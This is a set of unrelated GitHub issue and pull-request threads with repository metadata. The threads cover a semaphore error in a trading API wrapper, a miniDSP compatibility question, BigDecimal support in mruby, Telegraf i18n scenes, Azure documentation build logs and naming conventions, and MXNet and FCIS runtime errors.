{ "authors": [ "Jaco-JvZ", "mrchrisok", "yAnn1ck-B" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8721", "repo": "mrchrisok/OandaV20", "url": "https://github.com/mrchrisok/OandaV20/issues/14" }
gharchive/issue
Adding the specified count to the semaphore would cause it to exceed its maximum count First off, I have to say, this wrapper is great, I've been using it with great success. However at some point I had the need to fire off these Rest20 commands as async Tasks and I occasionally received an error in StreamSession.cs mentioning: Adding the specified count to the semaphore would cause it to exceed its maximum count I recognize these errors from when the database context of entity frame has not been properly disposed. However in this case there is no database context, so I am very curious as to what the reason could be and how I can fix it Hi yAnn1ck, First: The OandaV20 code and repo is no longer supported. Please migrate to OandaV20.2. Second: The Semaphore class is Not used within OkonkwoOandaV20 library. Any issue(s) you may be experiencing may be due to your code or environment. That said, the Semaphore class is used in the sample app, OkonkwoOandaV20App. It is also used in the test project, OkonkwoOandaV20Test. In both cases, the semaphore usage was inelegant and not intended for production. Please refer to Microsoft docs at the link below on the Semaphore class for detailed information on the proper use of the Semaphore. If you need further assistance, please provide a code snippet. Thanks, Chris Good day mrchrisok, Can you possibly indicate where OandaV20.2 can be found, I would like to migrate but I don't know where to find this repo.... Regards, JvZ OANDAV20.2 is available here: https://github.com/mrchrisok/OandaV20.2
2025-04-01T06:39:41.099905
2023-04-15T21:29:47
1669580431
{ "authors": [ "holisticagile", "scottshanafelt" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8722", "repo": "mrene/minidsp-rs", "url": "https://github.com/mrene/minidsp-rs/issues/568" }
gharchive/issue
Check with DeviceControl Software Update Hey, did anybody check compatibility with new Devices Control Software from minidsp? Would love to clarify before updating and breaking the connection for minidsp-rs thy I think you are refering to device console? I did upgrade my SHD to that latest firmware. While minidsp-rs works in every way I've tried with it, the ability for device console to "tunnel" through minidsp-rs directly to the SHD does not work. Device Console throws some error when I attempt to connect. The MiniDSP android app does continue to work. ok, cool. Thank you for your reply. I would not like to loose the ability to control via. api my minidsp. :)
2025-04-01T06:39:41.183864
2024-02-05T16:52:35
2119016708
{ "authors": [ "JobMoll", "deandreamatias", "mrrhak" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8723", "repo": "mrrhak/icons_launcher", "url": "https://github.com/mrrhak/icons_launcher/issues/48" }
gharchive/issue
[FEATURE REQUEST] add support for notifications icons :speech_balloon: Description It would be awesome if this package also generates the icons for notifications. :question: Platform This would be for Android. Duplicated #29 I have add android notification icon on this release v3.0.0-beta.1
2025-04-01T06:39:41.189167
2017-04-30T03:12:57
225300897
{ "authors": [ "Asmod4n", "beoran", "chasonr", "torsakch" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8724", "repo": "mruby/mruby", "url": "https://github.com/mruby/mruby/issues/3646" }
gharchive/issue
Does it has BigDecimal in mruby? I found that in some circumstances I need highly precise decimal type for calculation. So does Mruby support BigDecimal or does it has Mruby gems to support that? thanks!! If not, what should I do the achieve that? There is a gem to add bignum support. https://github.com/chasonr/mruby-gmp-bignum/ or https://github.com/chasonr/mruby-bignum/ Read the readme on how to use it, because it either needs a forked mruby version or you have to use special functions to to math on them. @Asmod4n Thank you very much. However, as my understandings, the gem does not support the BigDecimal. For example, if I want "123456789.123456789 + 123456789.123456789", it should be "246913578.246913578". But for now I got "246913578.246913". Am I correct? if you want to use + - * / you have to read the readme of the gem. It should work with 123456789.123456789.to_bn + 123456789.123456789 but i haven't use those gems yet. Since there are external mrbgems to implement bignum, and the ISO standard does not require bignum, I suggest we close this issue as wontfix. Just to clarify: the Bignum gems implement integer arithmetic, not decimal floating point as torsakch seems to want. They could be used as a basis for a BigDecimal class, but they do not provide BigDecimal themselves.
2025-04-01T06:39:41.198825
2023-05-21T06:49:16
1718392240
{ "authors": [ "Chococoin", "msaebi031" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8725", "repo": "msaebi031/i18n-telegraf", "url": "https://github.com/msaebi031/i18n-telegraf/issues/1" }
gharchive/issue
Issue with implementing ctx.i18n.t("...") in Telegraf's "scenes" Hello, Thank you for your contribution. I am currently exploring how to make ctx.i18n.t("...") work in Telegraf's "scenes", and I'm encountering some difficulties. I would appreciate any assistance or guidance on this matter. Could you please provide more information on how to effectively implement ctx.i18n.t("...") into "scenes" in Telegraf? Any examples or code snippets demonstrating the correct usage would be greatly appreciated. Additionally, if there are any specific configurations or dependencies that need to be considered, please let me know. Thank you in advance for your help. I'm eager to resolve this issue and make progress with my project. Best regards, Germán Lugo Hello Use the same as the examples given And it does not require any special affiliation But if you need more help, contact me on Telegram t.me/Target_Designer ‫‪Germán Lugo‬‏ @.***‬‏> در تاریخ یکشنبه ۲۱ مه ۲۰۲۳ ساعت ۱۰:۱۹ نوشت:‬ Hello, Thank you for your contribution. I am currently exploring how to make ctx.i18n.t("...") work in Telegraf's "scenes", and I'm encountering some difficulties. I would appreciate any assistance or guidance on this matter. Could you please provide more information on how to effectively implement ctx.i18n.t("...") into "scenes" in Telegraf? Any examples or code snippets demonstrating the correct usage would be greatly appreciated. Additionally, if there are any specific configurations or dependencies that need to be considered, please let me know. Thank you in advance for your help. I'm eager to resolve this issue and make progress with my project. Best regards, Germán Lugo — Reply to this email directly, view it on GitHub https://github.com/msaebi031/i18n-telegraf/issues/1, or unsubscribe https://github.com/notifications/unsubscribe-auth/AKR4BH6I5ZDBNJE5ZZXYWCTXHG3HPANCNFSM6AAAAAAYJGUUN4 . You are receiving this because you are subscribed to this thread.Message ID: @.***> Hi msaebi031, Thank you for your quick response. I have found a solution. Inside the Scene file: ctx.reply(ctx.scene.ctx.i18n.t("test")) The trouble maybe is because I'm exporting the Scenes from a subfolder. Best regards.
2025-04-01T06:39:41.236649
2024-10-17T22:51:51
2595925036
{ "authors": [ "shodimaggio" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8727", "repo": "msiplab/TanSacNet", "url": "https://github.com/msiplab/TanSacNet/issues/9" }
gharchive/issue
Sequential processing dRi = fcn_singleOrthonormalMatrixGeneration(angles,mus,partial_difference=True,index_pd_angle=iAngle) # TODO: Sequential processing https://github.com/msiplab/TanSacNet/blob/fda9ca7f20ca0420b7f480b7d2da8de93a4a289c/code/appendix/torch_tansacnet/orthonormalTransform.py#L367 Refactoring the backward method of GivensRotaitons4Synthesizer in orthonormalTransform.py to reflect the sequential differential calculation process.
2025-04-01T06:39:41.264874
2018-12-21T21:04:17
393590326
{ "authors": [ "VSC-Service-Account", "laschultz" ], "license": "CC-BY-4.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8728", "repo": "mspnp/architecture-center", "url": "https://github.com/mspnp/architecture-center/pull/1114" }
gharchive/pull-request
Complete copy edit pass. @rotycenh OPS Build status updates of commit c158ee4: :clock10: Preparing: average preparing time is 45 sec(s) OPS Build status updates of commit c158ee4: :clock10: Incremental building: average incremental building time is 23 sec(s) OPS Build status updates of commit c158ee4: :warning: Validation status: warnings File Status Preview URL Details toc.json :warning:Warning Details bread/toc.json :warning:Warning Details building-blocks/extending-templates/toc.json :warning:Warning Details docs/cloud-adoption/infrastructure/logs-and-reporting/overview.md :white_check_mark:Succeeded View toc.json [Warning] Error happen when converting toc.json to Pdf. Details: Could not find file 'T:\azwh\toc.json'. bread/toc.json [Warning] Error happen when converting bread/toc.json to Pdf. Details: Could not find a part of the path 'T:\azwh\bread\toc.json'. building-blocks/extending-templates/toc.json [Warning] Error happen when converting building-blocks/extending-templates/toc.json to Pdf. Details: Could not find a part of the path 'T:\azwh\building-blocks\extending-templates\toc.json'. For more details, please refer to the build report. Note: If you changed an existing file name or deleted a file, broken links in other files to the deleted or renamed file are listed only in the full build report.
2025-04-01T06:39:41.269791
2017-12-29T22:01:10
285161272
{ "authors": [ "bennage", "joakimhellum-in" ], "license": "CC-BY-4.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8729", "repo": "mspnp/architecture-center", "url": "https://github.com/mspnp/architecture-center/pull/342" }
gharchive/pull-request
naming conventions: change 3-letter suffix for Data Lake Store from 'dtl' to 'dls' Dear all, could you please consider if it make sense to change 3-letter suffix for Data Lake Store from 'dtl' to 'dls'. The justification is that other tools already use the 'dls' abbreviation (such as Azure CLI ). Also 'dls' seem to be appropriate for the resoure type 'Microsoft.DataLakeStore'. Ref. 5fe63d8. Thanks (and sorry about the messy PRs). FYI: 'dtl' is widely used abbreviation for DevTestLab, even some templates in azure-quickstart-templates repo use it (even though 'lab' perhaps is better abbreviation for DevTestLab). :white_check_mark: Validation status: passed File Status Preview URL Details docs/best-practices/naming-conventions.md :white_check_mark:Succeeded View For more details, please refer to the build report. Note: If you changed an existing file name or deleted a file, broken links in other files to the deleted or renamed file are listed only in the full build report.
2025-04-01T06:39:41.284064
2017-09-20T03:02:50
259025125
{ "authors": [ "mornfairy", "xuwentang", "yljylj" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8730", "repo": "msracver/Deep-Feature-Flow", "url": "https://github.com/msracver/Deep-Feature-Flow/issues/32" }
gharchive/issue
Shape error occur when running the experiment [09:38:23] /home/pdl/workspace2/ylj/MXNet/mxnet/dmlc-core/include/dmlc/logging.h:308: [09:38:23] src/operator/batch_norm-inl.h:238: Check failed: channelAxis < dshape.ndim() (1 vs. 0) Channel axis out of range: 1 Stack trace returned 10 entries: [bt] (0) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(_ZN4dmlc15LogMessageFatalD1Ev+0x3c) [0x7fd8fec99aac] [bt] (1) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(ZNK5mxnet2op13BatchNormProp10InferShapeEPSt6vectorIN4nnvm6TShapeESaIS4_EES7_S7+0x979) [0x7fd8ffbab989] [bt] (2) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(+0x16979e7) [0x7fd8ffb719e7] [bt] (3) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(+0x152be47) [0x7fd8ffa05e47] [bt] (4) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(_ZN5mxnet4exec10InferShapeEN4nnvm5GraphESt6vectorINS1_6TShapeESaIS4_EERKSs+0x83b) [0x7fd8ffa07afb] [bt] (5) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(MXSymbolInferShape+0x17ed) [0x7fd8ff99f62d] [bt] (6) /home/pdl/anaconda2/lib/python2.7/lib-dynload/_ctypes.so(ffi_call_unix64+0x4c) [0x7fd90e97857c] [bt] (7) /home/pdl/anaconda2/lib/python2.7/lib-dynload/_ctypes.so(ffi_call+0x1f5) [0x7fd90e977cd5] [bt] (8) /home/pdl/anaconda2/lib/python2.7/lib-dynload/_ctypes.so(_ctypes_callproc+0x3e6) [0x7fd90e96f376] [bt] (9) /home/pdl/anaconda2/lib/python2.7/lib-dynload/_ctypes.so(+0x9db3) [0x7fd90e966db3] infer_shape error. Arguments: data: (1L, 3L, 562L, 1000L) label: (1L, 20412L) bbox_target: (1L, 36L, 36L, 63L) bbox_weight: (1L, 36L, 36L, 63L) Traceback (most recent call last): File "dff_rfcn_end2end_train_test.py", line 19, in train_end2end.main() File "../../dff_rfcn/train_end2end.py", line 182, in main config['TRAIN']['begin_epoch'], config['TRAIN']['end_epoch'], config['TRAIN']['lr'], config['TRAIN']['lr_step']) File "../../dff_rfcn/train_end2end.py", line 101, in train_net sym_instance.infer_shape(data_shape_dict) File "../../dff_rfcn/../lib/utils/symbol.py", line 38, in infer_shape arg_shape, out_shape, aux_shape = self.sym.infer_shape(**data_shape_dict) File "/home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/symbol/symbol.py", line 958, in infer_shape res = self._infer_shape_impl(False, *args, **kwargs) File "/home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/symbol/symbol.py", line 1087, in _infer_shape_impl ctypes.byref(complete))) File "/home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/base.py", line 143, in check_call raise MXNetError(py_str(_LIB.MXGetLastError())) mxnet.base.MXNetError: Error in operator bn_conv1: [09:38:23] src/operator/batch_norm-inl.h:238: Check failed: channelAxis < dshape.ndim() (1 vs. 0) Channel axis out of range: 1 Stack trace returned 10 entries: [bt] (0) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(_ZN4dmlc15LogMessageFatalD1Ev+0x3c) [0x7fd8fec99aac] [bt] (1) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(ZNK5mxnet2op13BatchNormProp10InferShapeEPSt6vectorIN4nnvm6TShapeESaIS4_EES7_S7+0x979) [0x7fd8ffbab989] [bt] (2) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(+0x16979e7) [0x7fd8ffb719e7] [bt] (3) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(+0x152be47) [0x7fd8ffa05e47] [bt] (4) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(_ZN5mxnet4exec10InferShapeEN4nnvm5GraphESt6vectorINS1_6TShapeESaIS4_EERKSs+0x83b) [0x7fd8ffa07afb] [bt] (5) /home/pdl/workspace2/ylj/MXNet/mxnet/python/mxnet/../../lib/libmxnet.so(MXSymbolInferShape+0x17ed) [0x7fd8ff99f62d] [bt] (6) /home/pdl/anaconda2/lib/python2.7/lib-dynload/_ctypes.so(ffi_call_unix64+0x4c) [0x7fd90e97857c] [bt] (7) /home/pdl/anaconda2/lib/python2.7/lib-dynload/_ctypes.so(ffi_call+0x1f5) [0x7fd90e977cd5] [bt] (8) /home/pdl/anaconda2/lib/python2.7/lib-dynload/_ctypes.so(_ctypes_callproc+0x3e6) [0x7fd90e96f376] [bt] (9) /home/pdl/anaconda2/lib/python2.7/lib-dynload/_ctypes.so(+0x9db3) [0x7fd90e966db3] It seems like something wrong with the image shape, but I don't know how to solve it. Help, please! hello , i don't download DET and VID, can you share it?thank you. hello , i don't download DET and VID, can you share it?thank you. http://bvisionweb1.cs.unc.edu/ilsvrc2015/download-videos-3j16.php#vid
2025-04-01T06:39:41.285444
2017-05-27T01:09:37
231764180
{ "authors": [ "realwecan", "rnunziata" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8731", "repo": "msracver/FCIS", "url": "https://github.com/msracver/FCIS/issues/16" }
gharchive/issue
Illegal memory access with gpu_mask_voting It seems to me that for some images, gpu_mask_voting causes illegal memory access (the problem still exists after the latest fix on mask merge). This problem will go away if we use cpu_mask_voting instead. I have also encountered this...thanks for solution.